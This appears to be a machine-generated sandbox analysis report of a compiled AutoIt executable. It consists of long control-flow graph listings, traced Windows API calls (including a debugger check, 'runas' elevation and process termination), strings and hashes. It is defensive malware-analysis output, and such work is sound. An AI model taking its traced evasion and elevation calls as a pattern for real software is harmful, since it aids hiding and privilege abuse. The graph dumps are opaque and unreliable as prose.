88151->88168 88152 40a368 88155 42aad4 88152->88155 88163 40a397 88152->88163 88153 4115d7 52 API calls 88153->88154 88154->88097 88154->88116 88154->88132 88154->88135 88154->88138 88154->88141 88154->88143 88154->88144 88154->88150 88154->88153 88154->88156 88160 409c95 88154->88160 88621 45f508 52 API calls 88154->88621 88622 403e10 53 API calls 88154->88622 88629 46fe90 VariantClear VariantClear moneypunct 88155->88629 88623 47390f VariantClear 88156->88623 88157 42a7e4 VariantClear 88157->88168 88158 42a886 VariantClear 88158->88168 88160->87042 88161 40a3ce 88175 40a3d9 moneypunct 88161->88175 88630 40b400 VariantClear VariantClear moneypunct 88161->88630 88162 40e270 VariantClear 88162->88168 
88163->88161 88188 40a42c moneypunct 88163->88188 88609 40b400 VariantClear VariantClear moneypunct 88163->88609 88166 4115d7 52 API calls 88166->88168 88167 42abaf 88171 42abd4 VariantClear 88167->88171 88182 40a4ee moneypunct 88167->88182 88168->88137 88168->88148 88168->88151 88168->88152 88168->88155 88168->88157 88168->88158 88168->88162 88168->88166 88170 4115d7 52 API calls 88168->88170 88627 470870 52 API calls 88168->88627 88628 44ccf1 VariantClear moneypunct 88168->88628 88169 40a4dc 88169->88182 88632 40e270 VariantClear moneypunct 88169->88632 88172 42a5a6 VariantInit VariantCopy 88170->88172 88171->88182 88172->88168 88177 42a5c6 VariantClear 88172->88177 88173 42ac4f 88181 42ac79 VariantClear 88173->88181 88186 40a546 moneypunct 88173->88186 88176 40a41a 88175->88176 88179 42ab44 VariantClear 88175->88179 88175->88188 88176->88188 88631 40e270 VariantClear moneypunct 88176->88631 88177->88168 88178 40a534 88178->88186 88633 40e270 VariantClear moneypunct 88178->88633 88179->88188 88181->88186 88182->88173 88182->88178 88183 42ad28 88189 42ad4e VariantClear 88183->88189 88194 40a583 moneypunct 88183->88194 88186->88183 88187 40a571 88186->88187 88187->88194 88634 40e270 VariantClear moneypunct 88187->88634 88188->88167 88188->88169 88189->88194 88191 40a650 moneypunct 88191->87042 88192 42ae0e VariantClear 88192->88194 88194->88191 88194->88192 88635 40e270 VariantClear moneypunct 88194->88635 88195->87042 88196->87042 88197->87042 88198->86990 88199->86996 88200->87042 88201->87042 88202->87042 88203->87042 88204->87047 88205->87047 88206->87047 88207->87047 88208->87047 88209->87047 88210->87047 88212 403cdf 88211->88212 88213 408f40 VariantClear 88212->88213 88214 403ce7 88213->88214 88214->87034 88215->87047 88216->87047 88217->87042 88218->86987 88220 408e94 88219->88220 88221 408e88 88219->88221 88223 45340c 85 API calls 88220->88223 88222 408f40 VariantClear 88221->88222 88222->88220 88223->87952 88224->87956 88225->87958 88226->87960 
88227->87943 88228->87951 88229->87972 88230->87969 88231->87989 88232->87990 88233->87951 88235 40a7a6 88234->88235 88236 40ae8c 88234->88236 88238 4115d7 52 API calls 88235->88238 88277 41130a 51 API calls __cinit 88236->88277 88271 40a7c6 moneypunct _memmove 88238->88271 88239 40a86d 88240 40abd1 88239->88240 88256 40a878 moneypunct 88239->88256 88282 45e737 90 API calls 3 library calls 88240->88282 88241 401b10 52 API calls 88241->88271 88243 40bc10 53 API calls 88243->88271 88244 40b5f0 89 API calls 88244->88271 88245 408e80 VariantClear 88245->88271 88246 42b791 VariantClear 88246->88271 88247 42ba2d VariantClear 88247->88271 88248 408f40 VariantClear 88248->88256 88249 40a884 moneypunct 88249->87989 88250 40e270 VariantClear 88250->88271 88251 42b459 VariantClear 88251->88271 88253 42b6f6 VariantClear 88253->88271 88254 408cc0 185 API calls 88254->88271 88255 42bc5b 88255->87989 88256->88248 88256->88249 88257 42bbf5 88283 45e737 90 API calls 3 library calls 88257->88283 88258 42bb6a 88285 44b92d VariantClear 88258->88285 88259 4115d7 52 API calls 88262 42b5b3 VariantInit VariantCopy 88259->88262 88261 408f40 VariantClear 88261->88271 88265 42b5d7 VariantClear 88262->88265 88262->88271 88265->88271 88266 4115d7 52 API calls 88266->88271 88268 42bc37 88284 45e737 90 API calls 3 library calls 88268->88284 88271->88239 88271->88240 88271->88241 88271->88243 88271->88244 88271->88245 88271->88246 88271->88247 88271->88250 88271->88251 88271->88253 88271->88254 88271->88257 88271->88258 88271->88259 88271->88261 88271->88266 88271->88268 88274 4530c9 VariantClear 88271->88274 88278 45308a 53 API calls 88271->88278 88279 470870 52 API calls 88271->88279 88280 457f66 87 API calls __write_nolock 88271->88280 88281 472f47 127 API calls 88271->88281 88272 42bc48 88272->88258 88273 408f40 VariantClear 88272->88273 88273->88258 88274->88271 88275->87977 88276->87981 88277->88271 88278->88271 88279->88271 88280->88271 88281->88271 88282->88258 88283->88258 88284->88272 
88285->88255 88286->87997 88287->88000 88288->88017 88289->88015 88290->88005 88291->88039 88292->88052 88293->88039 88294->88049 88295->88039 88296->88049 88297->88034 88298->88049 88299->88037 88300->88049 88301->88049 88302->88032 88304 4289d2 88303->88304 88305 408db3 88303->88305 88335 45e737 90 API calls 3 library calls 88304->88335 88333 40bec0 90 API calls 88305->88333 88308 408dc9 88309 4289e5 88308->88309 88312 428a05 88308->88312 88314 40a780 192 API calls 88308->88314 88315 408e64 88308->88315 88317 408f40 VariantClear 88308->88317 88318 408e5a 88308->88318 88334 40ba10 52 API calls 2 library calls 88308->88334 88336 45e737 90 API calls 3 library calls 88309->88336 88313 408f40 VariantClear 88312->88313 88313->88318 88314->88308 88316 408f40 VariantClear 88315->88316 88316->88318 88317->88308 88318->88059 88320 408f40 VariantClear 88319->88320 88321 403d20 88320->88321 88322 403cd0 VariantClear 88321->88322 88323 403d4d 88322->88323 88326 4013c0 52 API calls 88323->88326 88337 45e17d 88323->88337 88347 4755ad 88323->88347 88350 467897 88323->88350 88394 40de10 88323->88394 88399 46e91c 88323->88399 88324 403d76 88324->88056 88324->88066 88326->88324 88331->88056 88332->88058 88333->88308 88334->88308 88335->88309 88336->88312 88338 45e198 88337->88338 88339 45e19c 88338->88339 88340 45e1b8 88338->88340 88341 408f40 VariantClear 88339->88341 88342 45e1cc 88340->88342 88343 45e1db FindClose 88340->88343 88344 45e1a4 88341->88344 88345 45e1d9 moneypunct 88342->88345 88402 44ae3e 88342->88402 88343->88345 88344->88324 88345->88324 88415 475077 88347->88415 88349 4755c0 88349->88324 88353 4678bb 88350->88353 88351 467954 88352 4115d7 52 API calls 88351->88352 88380 467964 88351->88380 88354 467989 88352->88354 88353->88351 88531 45340c 85 API calls 88353->88531 88357 467995 88354->88357 88535 40da60 53 API calls 88354->88535 88356 4678f6 88358 413a0e __wsplitpath 46 API calls 88356->88358 88360 4533eb 85 API calls 88357->88360 88361 4678fc 88358->88361 88362 
4679b7 88360->88362 88363 401b10 52 API calls 88361->88363 88519 40de40 88362->88519 88365 46790c 88363->88365 88532 40d200 52 API calls 2 library calls 88365->88532 88368 4679c7 GetLastError 88371 403cd0 VariantClear 88368->88371 88369 467a05 88372 467a2c 88369->88372 88373 467a4b 88369->88373 88370 467917 88370->88351 88533 4339fa GetFileAttributesW FindFirstFileW FindClose 88370->88533 88374 4679dc 88371->88374 88376 4115d7 52 API calls 88372->88376 88377 4115d7 52 API calls 88373->88377 88378 4679e6 88374->88378 88383 44ae3e CloseHandle 88374->88383 88381 467a31 88376->88381 88382 467a49 88377->88382 88385 408f40 VariantClear 88378->88385 88379 467928 88379->88351 88384 46792f 88379->88384 88380->88324 88536 436299 52 API calls 2 library calls 88381->88536 88389 408f40 VariantClear 88382->88389 88383->88378 88534 4335cd 56 API calls 3 library calls 88384->88534 88388 4679ed 88385->88388 88388->88324 88391 467a88 88389->88391 88390 467939 88390->88351 88392 408f40 VariantClear 88390->88392 88391->88324 88393 467947 88392->88393 88393->88351 88395 4115d7 52 API calls 88394->88395 88396 40de23 88395->88396 88397 40da20 CloseHandle 88396->88397 88398 40de2e 88397->88398 88398->88324 88549 46e785 88399->88549 88401 46e92f 88401->88324 88404 44ae4b moneypunct 88402->88404 88405 443fdf 88402->88405 88404->88345 88410 40da20 88405->88410 88407 443feb 88414 4340db CloseHandle moneypunct 88407->88414 88409 444001 88409->88404 88411 40da37 88410->88411 88412 40da29 88410->88412 88411->88412 88413 40da3c CloseHandle 88411->88413 88412->88407 88413->88407 88414->88409 88466 4533eb 88415->88466 88418 4750ee 88421 408f40 VariantClear 88418->88421 88419 475129 88470 4646e0 88419->88470 88426 4750f5 88421->88426 88422 47515e 88423 475162 88422->88423 88460 47518e 88422->88460 88424 408f40 VariantClear 88423->88424 88455 475169 88424->88455 88425 475357 88427 475365 88425->88427 88428 4754ea 88425->88428 88426->88349 88504 44b3ac 57 API calls 88427->88504 88510 464812 91 API 
calls 88428->88510 88432 4754fc 88433 475374 88432->88433 88435 475508 88432->88435 88483 430d31 88433->88483 88434 4533eb 85 API calls 88434->88460 88436 408f40 VariantClear 88435->88436 88439 47550f 88436->88439 88439->88455 88440 475388 88490 4577e9 88440->88490 88442 47539e 88498 410cfc 88442->88498 88443 475480 88445 408f40 VariantClear 88443->88445 88445->88455 88447 4753d4 88506 40e830 53 API calls 88447->88506 88448 4753b8 88505 45e737 90 API calls 3 library calls 88448->88505 88451 4753c5 GetCurrentProcess TerminateProcess 88451->88447 88452 4753e3 88464 475406 88452->88464 88507 40cf00 53 API calls 88452->88507 88453 4754b5 88454 408f40 VariantClear 88453->88454 88454->88455 88455->88349 88460->88425 88460->88434 88460->88443 88460->88453 88460->88460 88502 436299 52 API calls 2 library calls 88460->88502 88503 463ad5 64 API calls __wcsicoll 88460->88503 88462 408e80 VariantClear 88462->88464 88464->88455 88464->88462 88465 408f40 VariantClear 88464->88465 88509 40cf00 53 API calls 88464->88509 88465->88464 88467 453404 88466->88467 88468 4533f8 88466->88468 88467->88418 88467->88419 88468->88467 88513 4531b1 85 API calls 5 library calls 88468->88513 88514 4536f7 53 API calls 88470->88514 88472 4646fc 88515 4426cd 59 API calls _wcslen 88472->88515 88474 464711 88476 40bc70 52 API calls 88474->88476 88482 46474b 88474->88482 88477 46472c 88476->88477 88516 461465 52 API calls _memmove 88477->88516 88479 464741 88480 40c600 52 API calls 88479->88480 88480->88482 88481 464793 88481->88422 88482->88481 88517 463ad5 64 API calls __wcsicoll 88482->88517 88484 430db2 88483->88484 88485 430d54 88483->88485 88484->88440 88486 4115d7 52 API calls 88485->88486 88487 430d74 88486->88487 88488 430da9 88487->88488 88489 4115d7 52 API calls 88487->88489 88488->88440 88489->88487 88491 457a84 88490->88491 88497 45780c _strcat moneypunct _wcslen _wcscpy 88490->88497 88491->88442 88492 443006 57 API calls 88492->88497 88494 4135bb 46 API calls _malloc 88494->88497 88495 
(Control-flow graph node and edge list, rendered as an interactive graph on the original page, not reproduced here.)
APIs
• _wcslen.LIBCMT ref: 004096C1
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• _memmove.LIBCMT ref: 0040970C
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
• _memmove.LIBCMT ref: 00409D96
• _memmove.LIBCMT ref: 0040A6C4
• _memmove.LIBCMT ref: 004297E5
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
• String ID:
• API String ID: 2383988440-0
• Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
• Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
• Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
• Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
  • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
  • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
• IsDebuggerPresent.KERNEL32 ref: 0040D5B6
• GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
  • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
• SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
• MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
• SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
• GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
• ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
  • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
  • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
  • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
  • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
  • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
  • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
Strings
• This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
• runas, xrefs: 0042E2AD, 0042E2DC
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
• String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
• API String ID: 2495805114-3383388033
• Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
• Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
• Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
• Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

Control-flow Graph

(Control-flow graph for function 40e500, rendered as an interactive graph on the original page with executed and not-executed blocks; node and edge list not reproduced here.)
APIs
• GetVersionExW.KERNEL32(?), ref: 0040E52A
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
• GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
• FreeLibrary.KERNEL32(?), ref: 0040E642
• FreeLibrary.KERNEL32(?), ref: 0040E654
Strings
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
• String ID: 0SH$#v
• API String ID: 3363477735-2448020801
• Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
• Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
• Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
• Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
APIs
• LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
• GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
Strings
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: IsThemeActive$uxtheme.dll
• API String ID: 2574300362-3542929980
• Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
• Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
• Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
• Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                                                APIs
                                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeInfoLibraryParametersSystem
                                                                                                • String ID: #v
                                                                                                • API String ID: 3403648963-554117064
                                                                                                • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                                                • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                                                APIs
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                                • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                                • TranslateMessage.USER32(?), ref: 00409556
                                                                                                • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: Message$Peek$DispatchSleepTranslate
                                                                                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                • API String ID: 1762048999-758534266
                                                                                                • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                                • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                                • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                                • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • __wcsicoll.LIBCMT ref: 00402007
                                                                                                • __wcsicoll.LIBCMT ref: 0040201D
                                                                                                • __wcsicoll.LIBCMT ref: 00402033
                                                                                                  • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                                                • __wcsicoll.LIBCMT ref: 00402049
                                                                                                • _wcscpy.LIBCMT ref: 0040207C
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                                                                • API String ID: 3948761352-1609664196
                                                                                                • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                                                • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                                                • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                                                • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                                                • __wsplitpath.LIBCMT ref: 0040E41C
                                                                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                • _wcsncat.LIBCMT ref: 0040E433
                                                                                                • __wmakepath.LIBCMT ref: 0040E44F
                                                                                                  • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                • _wcscpy.LIBCMT ref: 0040E487
                                                                                                  • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                • _wcscat.LIBCMT ref: 00427541
                                                                                                • _wcslen.LIBCMT ref: 00427551
                                                                                                • _wcslen.LIBCMT ref: 00427562
                                                                                                • _wcscat.LIBCMT ref: 0042757C
                                                                                                • _wcsncpy.LIBCMT ref: 004275BC
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                                                • String ID: Include$\
                                                                                                • API String ID: 3173733714-3429789819
                                                                                                • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                                • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                                                • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                                • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • _fseek.LIBCMT ref: 0045292B
                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                • __fread_nolock.LIBCMT ref: 00452961
                                                                                                • __fread_nolock.LIBCMT ref: 00452971
                                                                                                • __fread_nolock.LIBCMT ref: 0045298A
                                                                                                • __fread_nolock.LIBCMT ref: 004529A5
                                                                                                • _fseek.LIBCMT ref: 004529BF
                                                                                                • _malloc.LIBCMT ref: 004529CA
                                                                                                • _malloc.LIBCMT ref: 004529D6
                                                                                                • __fread_nolock.LIBCMT ref: 004529E7
                                                                                                • _free.LIBCMT ref: 00452A17
                                                                                                • _free.LIBCMT ref: 00452A20
                                                                                                Similarity
                                                                                                • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                                                • String ID:
                                                                                                • API String ID: 1255752989-0
                                                                                                • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                                • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                                                • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                                • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                • String ID: FILE
                                                                                                • API String ID: 3888824918-3121273764
